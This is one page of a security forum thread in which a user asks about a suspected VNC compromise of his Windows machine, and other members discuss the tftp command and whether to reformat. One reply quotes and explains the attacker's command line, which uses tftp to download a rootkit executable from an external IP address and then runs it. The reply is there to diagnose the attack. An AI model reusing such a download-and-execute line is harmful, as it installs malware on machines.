Page 3 of 4 FirstFirst 1234 LastLast
Results 21 to 30 of 31

Thread: possible vnc hack

  1. #21
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Maybe TFTP works in linux, not windows? I dont have my box in front of me at the moment.

    EDIT: Ooops, nope TFTP works on my XP box. FORMAT or talk to streaker, he's got some pointers on cleaning boxes
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

  2. #22
    Just burned his ISO
    Join Date
    Jun 2006
    Posts
    12

    Default

    men...i you macchine have been compromised...now it could still be there with another name...
    if you read some...meny experts recomend format after been "compromised" because you may ever know what else happen to your machine!

    sorry for my english.

  3. #23
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default

    Quote Originally Posted by demente View Post
    men...i you macchine have been compromised...now it could still be there with another name...
    if you read some...meny experts recomend format after been "compromised" because you may ever know what else happen to your machine!

    sorry for my english.
    I scoff at such 'experts'.

    I just wrote a thread the other day with pretty much all the information you need to clean up our machine without reformatting it.

    It's under the General Information section.
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  4. #24
    Member
    Join Date
    Jan 2007
    Posts
    117

    Angry

    Quote Originally Posted by streaker69 View Post
    I scoff at such 'experts'.

    I just wrote a thread the other day with pretty much all the information you need to clean up our machine without reformatting it.

    It's under the General Information section.
    ill take a look. i know it can be done and i really loathe formatting lol.

    Maybe TFTP works in linux, not windows? I dont have my box in front of me at the moment.

    EDIT: Ooops, nope TFTP works on my XP box. FORMAT or talk to streaker, he's got some pointers on cleaning boxes
    thats weird...when i type in tftp in the command prompt i get "command cannot be found" are you sure you didnt install anything extra?

    edit: wow, thats bizzar. i dont know if its because im running 64bit or what, but tftp is not found as a command on my desktop. i dont know why the attacker would disable or uninstall it...also, when these commands were run, they all failed. there were 12 command prompt windows and they all said "tftp is not a recognized command"

  5. #25
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Quote Originally Posted by ats1080 View Post
    thats weird...when i type in tftp in the command prompt i get "command cannot be found" are you sure you didnt install anything extra?
    Positive........
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

  6. #26
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by streaker69 View Post
    I scoff at such 'experts'.
    I just wrote a thread the other day with pretty much all the information you need to clean up our machine without reformatting it.
    It's under the General Information section.
    I'll scoff at them with you streaker !
    To the ats1080 here is the guide:
    http://forums.remote-exploit.org/showthread.php?t=13110
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #27
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Actually, a funny trick I learned...

    If you have to format someone's drive, Keep the Wallpaper and put it back after the reformat (if this is a picture of their kids or whatever). This almost "tricks" them into believing it was their old machine. I know it sounds lame, but it works and they feel happy. Even if they have to start reinstalling programs, they think it's "their old machine" just cleaned up.

    But around here we dont have time to dabble into machines, we transfer their shizzola to a good working freshly reimaged one and pick apart the old one on the backend (if it's hardware) software gets the reimage of doom.
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

  8. #28
    Member
    Join Date
    Jan 2007
    Posts
    117

    Default

    Quote Originally Posted by spankdidly View Post
    Actually, a funny trick I learned...

    If you have to format someone's drive, Keep the Wallpaper and put it back after the reformat (if this is a picture of their kids or whatever). This almost "tricks" them into believing it was their old machine. I know it sounds lame, but it works and they feel happy. Even if they have to start reinstalling programs, they think it's "their old machine" just cleaned up.

    But around here we dont have time to dabble into machines, we transfer their shizzola to a good working freshly reimaged one and pick apart the old one on the backend (if it's hardware) software gets the reimage of doom.
    its my computer, so it doesnt really matter about the format. i just hate reinstalling apps lol. but did anyone ever figure out what that command is?

  9. #29
    Junior Member unix_r00ter's Avatar
    Join Date
    Feb 2007
    Posts
    64

    Default

    vnc autorooter, old but still going around..

    it sends keys to a vulnerable vnc server and installs the backdoor..
    %comspec% takes you to system32 folder
    /c echo Repairing user32.dll tries to make the program look legit
    tftp -i 201.252.11.200 GET cazz.exe & start cazz&
    well that connects via tftp to the IP and gets the rootkit "cazz.exe" and starts it.

  10. #30
    Junior Member
    Join Date
    Apr 2007
    Posts
    57

    Default

    Quote Originally Posted by ats1080 View Post
    ill take a look. i know it can be done and i really loathe formatting lol.



    thats weird...when i type in tftp in the command prompt i get "command cannot be found" are you sure you didnt install anything extra?

    edit: wow, thats bizzar. i dont know if its because im running 64bit or what, but tftp is not found as a command on my desktop. i dont know why the attacker would disable or uninstall it...also, when these commands were run, they all failed. there were 12 command prompt windows and they all said "tftp is not a recognized command"
    Maybes try "tftp.exe" in the CMD/Dos window ?

    As for a free VPN, have a look around :

    h***s://secure.logmein.com/products/hamachi/vpn.asp?lang=en

    NOTE the "s" ^^^ as in secure

Page 3 of 4 FirstFirst 1234 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •